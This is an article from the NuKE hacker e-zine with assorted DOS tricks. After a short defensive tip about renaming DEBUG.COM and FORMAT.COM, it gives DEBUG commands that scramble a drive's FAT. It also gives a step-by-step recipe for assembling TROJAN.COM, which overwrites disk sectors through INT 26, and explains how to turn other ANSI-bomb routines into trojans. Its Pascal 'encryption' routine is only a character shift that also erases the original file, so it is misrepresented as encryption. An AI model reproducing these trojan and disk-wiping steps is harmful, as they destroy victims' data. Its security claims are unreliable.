Copy Link
Add to Bookmark
Report
NuKE Issue 01-024
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Various :
This whole section is dedicated to all kinds of little tricks I've
accumulated over a while.
ÄÄ> First of all, before this goes any further, anyone who is vulnerable to
hacking (Sysops...), do the following:
RENAME your DEBUG.COM and FORMAT.COM files to something else, or take them
out of the PATH. This gives a better protection against ANSI bombs and Batch
file trojans, that call on these files to do there work. This might seem
fairly obvious, and perhaps stupid, to some of you, but you would be surprised
at the number of people who get nailed because of this.
ÄÄ> Well some people have asked me how to make a program that would encrypt
text files. Well I've thought about it, and came up with a little Turbo Pascal
routine that does the job just fine.
PROGRAM CRYPT;
VAR
f,g : TEXT;
ch,b : CHAR;
c : BYTE;
BEGIN
ASSIGN (f,'TEST.TXT'); { replace to ASSIGN (f,Paramstr(1)) if you want to }
ASSIGN (g,'CRYPT.TXT'); { enter the filename in the command string. }
RESET (f); REWRITE (g);
WHILE NOT EOF(f) DO
Begin
READ (f,ch);
c := (ORD(ch) + 32);
b := CHR(c);
WRITE (g,b);
End;
CLOSE (f); CLOSE (g);
ERASE (f); { you might want to take this off if you're unsure about the file}
END.
This will add 32 to the character value of each character in the text file,
and write it in CRYPT.TXT.
To reverse the encryption, simply compile and run the following.
PROGRAM UNCRYPT;
VAR
f,g : TEXT;
ch,b : CHAR;
c : BYTE;
BEGIN
ASSIGN (f,'TEST.TXT');
ASSIGN (g,'CRYPT.TXT'); { Same comment as before }
RESET (g); REWRITE (f);
WHILE NOT EOF(g) DO
Begin
READ (g,ch);
c := (ORD(ch) - 32);
b := CHR(c);
WRITE (f,b);
End;
CLOSE (f); CLOSE (g); ERASE (g);
END.
ÄÄ> Here are a few tricks using DEBUG. First off the following commands, when
entered under the Debug prompt, will rearrange the FATs on a selected drive.
Just pick one:
WCS:100 x 1 100 where x is the drive number: A: = 0, B: = 1, C: = 2 ...
W 1 x 1 100 same as above.
Next, you might have noticed that many ANSI bombs use Debug routines... These
Debug routines can easily be turned into Trojans. I will show you an example
using the Debug routine found in one of the .BMB files found in the RABID ANSI
Bomb Generator 2B:
C:\> DEBUG <CR>
- A <CR>
xxxx:nnnn MOV AL,02 <CR> {replace 02 with 00 for drive A:, 01 for drive B:...}
xxxx:nnnn MOV CX,5 <CR>
xxxx:nnnn MOV DX,0 <CR>
xxxx:nnnn INT 26 <CR>
xxxx:nnnn <CR> {copy down the nnnn number}
- N TROJAN.COM <CR>
- RBX <CR>
BX:0000
:0 <CR>
- RCX <CR>
CX:0000
:nnnn <CR> {type in the nnnn number noted earlier}
- W <CR>
WRITING nnnn BYTES
- Q <CR>
Just run TROJAN.COM. The preceding routine was a primitive variation of the
Corrupt Trojan v2.0 by Acid Face... I have used this under his permission.
To apply this system to other ANSI bomb routines, simply note the commands
issued by the infected file, and proceed in the same way. It might help to
have a copy of that .BMB file used earlier. Also, to see the commands issued
by the ANSI bomb, simply take DEBUG out of the PATH, or rename it, and type in
the ANSI bomb. The commands will scroll harmlessly on the screen.
Mechanix [NuKE]
